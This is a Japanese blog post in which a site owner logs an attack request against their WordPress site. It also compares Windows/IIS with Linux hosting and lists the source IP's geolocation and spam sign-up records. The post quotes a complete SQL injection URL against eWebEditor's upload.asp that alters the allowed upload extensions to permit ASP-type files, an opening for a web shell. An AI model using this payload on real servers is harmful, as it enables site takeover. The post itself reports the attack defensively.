いやーこれは、独特ですね。
WordPress を Windows Serverで運用したい!って方への攻撃なんですね。これって
今回は以下です。
wordpress/archives/6256/upload.asp?action=save&type=IMAGE&style=style=standard%20%20and%201=3%20union%20select%20S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt,%20%5BS_ImageExt%5D%2b%7Ccer%7Caspx%7Ccdx%7Casp%7Casaspp,S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl%20from%20ewebeditor_style%20where%20s_name=standard%20and%20a=a
一時データとかcdataを使わずに、直接なんて今時ありえるのかな?
これって、データベースのフィールド直打ちでしょ?
どう見ても、帯域考えてないよね。こんなの受け取れたらIISはクラッシュするわ。
windowsサーバの制約レスポンス、制限レスポンス非常に遅くて悪い。
バックで何動いているかと思ったら、vbaのカスタムだったり、dllだったり受け取れなかったらコケます的な仕様です。(T_T)>
プロセス毎こけちゃうの見たら使えねーと思いlinuxにした経緯を思い出す。
apacheやphpならさほど問題ないけど。
windowsなら、できますよー的で止まってしまい、データベース無し(あるけど・・web仕様じゃない)最低機器が30万ほどします。
linux系ならデータベース付きで、15,000円
同時アクセスで言えば、windows は10も行くと応答不能。
linux系は、25が表示だけど100でも問題なかった
IISの標準は貧弱、サーバ的に肝いり仕様の贅沢ならまだしも・・
攻撃元は、
IPv4 address:
27.153.186.56
IPv4 expanded:
027.153.186.056
IPv4 decimal:
463059512
Internet service provider:
China Telecom
Organization:
Fujian Province
Country name:
China
Country ISO alpha-2 code:
CN
State:
Fujian
City:
Putian
Timezone:
Asia/Shanghai
Longitude:
118.4983
Latitude:
24.9878
WHOIS data:
whois data is currently unavailable [GL85-85]. Try again in 15 hours, 41 min.
Reverse DNS host:
163data.com.cn
Reverse DNS pointer:
56.186.153.27.broad.pt.fj.dynamic.163data.com.cn
Reverse DNS in-addr.arpa:
56.186.153.27.in-addr.arpa domain name pointer 56.186.153.27.broad.pt.fj.dynamic.163data.com.cn.
Reverse DNS last updated:
0 seconds ago on April 9, 2016, 8:18 am GMT Time
Reverse DNS next update:
in 7 days on April 9, 2016, 8:18 am GMT Time
Bot/spider
No
Record requests
changeOnIncrement
また中国ですね。
9-Oct-15 02:17 27.153.186.56 nlmguzzxxl gertruderankins48@gmail.com
[ ge.rt.rude.ran.k.ins4.8@gmail.com ] China
9-Oct-15 02:17 27.153.186.56 nlmtimjnni gertruderankins48@gmail.com
[ g.e.r.t.r.u.d.e.r.an.k.i.ns.4.8@gmail.com ] China Evidence
9-Oct-15 02:15 27.153.186.56 itbiqjpdgr berthazimmermann648@gmail.com
[ b.er.t.h.azi.m.m.erma.nn.64.8@gmail.com ] China Evidence
9-Oct-15 02:11 27.153.186.56 frorcjezbu berthazimmermann648@gmail.com
[ b.e.rt.h.a.z.im.mer.mann64.8@gmail.com ] China Evidence
9-Oct-15 02:10 27.153.186.56 ituauutjcn berthazimmermann648@gmail.com
[ be.rt.ha.zi.m.m.erm.a.nn64.8@gmail.com ] China
9-Oct-15 02:07 27.153.186.56 frpnoohcok berthazimmermann648@gmail.com
[ be.r.t.h.a.z.i.mm.er.ma.n.n64.8@gmail.com ] China
9-Oct-15 01:58 27.153.186.56 nlleatrohf gertruderankins48@gmail.com
[ g.er.tru.d.e.ra.nkins4.8@gmail.com ] China Evidence
9-Oct-15 01:57 27.153.186.56 detcxeudza gertruderankins48@gmail.com
[ g.ert.rud.e.r.a.nk.i.n.s.48@gmail.com ]
尚且つ、スパマーですね。
このようなユーザがいるから、優良は人が迷惑する。